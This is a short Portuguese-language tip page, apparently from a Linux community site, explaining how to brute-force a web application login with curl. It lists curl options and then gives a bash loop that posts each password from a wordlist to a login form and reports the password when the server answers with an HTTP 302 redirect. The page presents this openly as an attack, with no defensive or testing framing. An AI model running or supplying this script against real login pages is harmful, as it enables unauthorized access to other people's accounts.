cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.642 ]
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.

for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Pronto, você já estará fazendo um ataque de brute-force através de uma "word list", usando o terminal.
Como criar um gerador de senha no Lazarus
Instrução for( ; ; ) aprimorada no Java 1.5
Vídeo aula: Trabalhando com o Quanta Plus
Instalando o jSMS no Ubuntu 7.04
Alterando a senha com apenas uma linha de comando
Converter WMA para MP3 no shell do Linux
Como realizar consultas em vários servidores simultaneamente
Script de backup + envio de e-mail
Windows e Samba com Desktop padronizado
Nenhum comentário foi encontrado.
IA Turbina o Desktop Linux enquanto distros renovam forças
Como extrair chaves TOTP 2FA a partir de QRCODE (Google Authenticator)
Linux em 2025: Segurança prática para o usuário
Desktop Linux em alta: novos apps, distros e privacidade marcam o sábado
IA chega ao desktop e impulsiona produtividade no mundo Linux
Atualizando o Fedora 42 para 43
Como saber se o seu e-mail já teve a senha vazada?
Como descobrir se a sua senha já foi vazada na internet?









